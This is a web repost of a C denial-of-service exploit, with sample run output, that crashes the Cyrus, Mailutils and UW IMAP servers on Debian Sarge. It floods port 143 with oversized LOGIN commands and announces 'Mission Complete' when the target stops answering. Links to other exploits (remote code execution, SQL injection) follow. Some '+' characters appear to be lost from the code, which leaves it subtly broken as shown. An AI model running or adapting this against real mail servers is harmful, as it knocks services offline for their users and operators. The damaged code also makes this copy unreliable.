Debian Sarge Multiple IMAP Server Denial of Service Exploit

所属分类: 网络安全 / Exploit 阅读数: 181
收藏 0 赞 0 分享
/*

Debian Sarge Multiple IMAP Server DoS (debianimapers.c)
Jeremy Brown [0xjbrown41@gmail.com/http://jbrownsec.blogspot.com]

Testing Cyrus IMAPd:

bash$ ./debianimapers 192.168.0.189

.....

39 tries and imapd goes down! Mission Complete!

Testing Mailutil's IMAP4d:

bash$ ./debianimapers 192.168.0.189

.....

38 tries and imapd goes down! Mission Complete!

Testing UW-IMAPd:

bash$ ./debianimapers 192.168.0.189

.....

39 tries and imapd goes down! Mission Complete!

bash$

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define COUNT 100
#define SIZE 100000

char imaplogin[] = "A0001 LOGIN";

int main(int argc, char *argv[])
{

char buffer[SIZE], imapped[SIZE 30];
int i, port = 143;

memset(buffer, 0x41, sizeof(buffer));
memset(imapped, 0, sizeof(imapped));

snprintf(imapped, sizeof(imapped)-1, "%s %s %s\r\n\r\n", imaplogin, buffer, buffer);

if(argc < 2)
{

printf("\nDebian Sarge Multiple IMAP Server DoS");
printf("\nJeremy Brown [0xjbrown41@gmail.com/http://jbrownsec.blogspot.com]\n");

printf("\nUsage %s <host>\n\n", argv[0]);

return 0;
}

printf("\nDebian Sarge Multiple IMAP Server DoS");
printf("\nJeremy Brown [0xjbrown41@gmail.com/http://jbrownsec.blogspot.com]\n");

int sock;
struct sockaddr_in remote;

remote.sin_family = AF_INET;
remote.sin_port = htons(port);
remote.sin_addr.s_addr = inet_addr(argv[1]);

if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) { printf("Error: socket()\n"); return -1; }
if(connect(sock,(struct sockaddr *)&remote, sizeof(struct sockaddr)) < 0) { printf("Error: connect(%s:%d)\n", argv[1], port); return -1; }

close(sock);

printf("\nUsually takes ~1-2 minutes, LAN/Internet and connection speed will make time vary...\n");

for(i = 0; i <= COUNT; i )
{

struct sockaddr_in remote;
remote.sin_family = AF_INET;
remote.sin_port = htons(port);
remote.sin_addr.s_addr = inet_addr(argv[1]);

if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) { printf("Error: socket()\n"); return -1; }

sleep(1);

if(connect(sock,(struct sockaddr *)&remote, sizeof(struct sockaddr)) < 0) { printf("\n%d tries and imapd goes down! Mission Complete!\n\n", i); return -1; }

int len = sizeof(imapped);
send(sock, imapped, len, 0);
close(sock);

}

return 0;
}

更多精彩内容其他人还在看

Maian Search

-[*] ================================================================================ [*]- -[*] Maian Search <= v1.1 Insecur
收藏 0 赞 0 分享

Maian Weblog

-[*] ================================================================================ [*]- -[*] Maian Weblog <= v4.0 Insecu
收藏 0 赞 0 分享

Maian Guestbook

-[*] ================================================================================ [*]- -[*] Maian Guestbook <= 3.2 Insec
收藏 0 赞 0 分享

Maian Recipe

-[*] ================================================================================ [*]- -[*] Maian Recipe <= v1.2 Insecu
收藏 0 赞 0 分享

fuzzylime cms 3.01 (commrss.php) Remote Code Execution Exploit

<?php ## ## Name: Fuzzylime 3.01 Remote Code Execution Exploit ## Credits: Charles "real" F. <charlesfol[a
收藏 0 赞 0 分享

jSite 1.0 OE (SQL/LFI) Multiple Remote Vulnerabilities

--== ================================================================================ ==-- --== jSite 1.0 OE Multiple Remot
收藏 0 赞 0 分享

Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability

==================================================================== Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability
收藏 0 赞 0 分享

WebCMS Portal Edition (id) Remote SQL Injection Vulnerability

############################################################### #################### Viva IslaM Viva IslaM #################### ##
收藏 0 赞 0 分享

fuzzylime cms 3.01 (polladd.php poll) Remote Code Execution Exploit (pl)

#!/usr/bin/perl #!!UPDATED!!!!UPDATED!!!!UPDATED!!!!UPDATED!!!!UPDATED!!!!UPDATED!!!!UPDATED!! #after i noticed that there was a prob
收藏 0 赞 0 分享

fuzzylime cms 3.01 (polladd.php poll) Remote Code Execution Exploit (php)

#!/usr/bin/php <?php ## ## Fuzzylime 3.01 Remote Code Execution ## Credits: Inphex and real ## ## [C:]# php fuzzylime.p
收藏 0 赞 0 分享
查看更多